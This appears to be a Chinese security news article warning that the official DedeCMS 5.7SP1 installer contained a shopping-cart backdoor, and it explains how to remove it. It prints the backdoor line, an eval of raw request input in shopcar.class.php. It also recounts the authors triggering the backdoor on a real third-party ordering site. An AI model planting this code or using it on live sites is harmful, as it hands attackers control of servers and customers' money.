DedeCMS被植入后门 你的钱直接上交黑客
安全防线
小新打黑
你想过这样的情况没有,你在网站中充值的钱,突然莫名其妙地消失了,而你向网站管理员投诉,网站管理员却说你根本没有充过值。你相信吗,这一幕极可能在你身边上演!
寻找铁证
DedeCMS是主流的CMS系统,被广泛应用于企业网站、中小型购物网站、政府网站、高校网站以及个人网站,这就意味着潜在的入侵目标数不胜数——以关键词“powered by dedecms”进行搜索,可以发现1350万个使用该系统的网站。最近,该系统出现了大问题。
那还得从几天前说起。小编的一位黑客圈的朋友告诉小编DedeCMS 5.7SP1官方安装包被黑客植入后门(织梦内容管理系统),当时小编并没有在意——这个消息较早就在黑客圈流传了,DedeCMS官方也进行了否认。
直到忙完手中活后,小编才关注了该消息。小编发现DedeCMS 5.7SP1版被悄悄地更新了。看来流言不是空穴来风!为了寻找后门,小编和朋友一起下载了旧版本的安装包,并用Hackman Disassembler等反汇编工具查看安装包的源代码,经过数小时的努力,终于找到了后门代码。
后门威胁网购人群
然后,我们寻找了一个目标网站进行试验。该网站是一个企业网站,允许通过网络下订单,我们在订单页面中调用后门激活程序包,通过程序包中的eval 、file_get_contents 等命令激活后门,此时就可以看到网站的目录,想做什么还不是轻而易举的事情!
为什么要寻找带网络订单的网站呢?因为后门代码存在于DedeCMS的购物车的关联文件中,凡是调用该购物车的行为均会触发后门。是不是看迷糊了,危害是什么?对网站管理员来说,黑客可以通过该后门控制网站,甚至进一步控制服务器。
对普通用户来说,如果在使用该安装包的网站中网购东东,你在网站中充值的钱会直接被黑客盗走,而充值信息会被全部抹杀,因此管理员一点不知情,你投诉都没有门!那后门如何清除呢?网站管理员下载最新的DedeCMS 5.7SP1,或者删除shopcar.class.php文件中的“@eval(file_get_contents('php://input'));”代码。
评论嘉宾
DedeCMS是国内用户量最大的PHP类CMS系统,因此该后门影响的网站数量庞大,潜在的安全威胁值得每一个网民警惕。——@360安全专家
我测试了一下,目前还有不少网站没有更新DedeCMS系统,还存在后门,这些网站对网民而言就是潜在的地雷。——@张硸(Dream黑客小组重要成员)
利用该漏洞,可以入侵网站、入侵服务器,挂马、钓鱼、盗号、偷钱,什么都可以干。这个后门很厉害。——@sker(Zerobox核心成员)
听说有人已经研制出批量拿DedeCMS网站的程序,如果该消息属实的话,对没有堵上漏洞的网站是一种灾难。——@狄鄂宇(死神镰刀组织重要成员)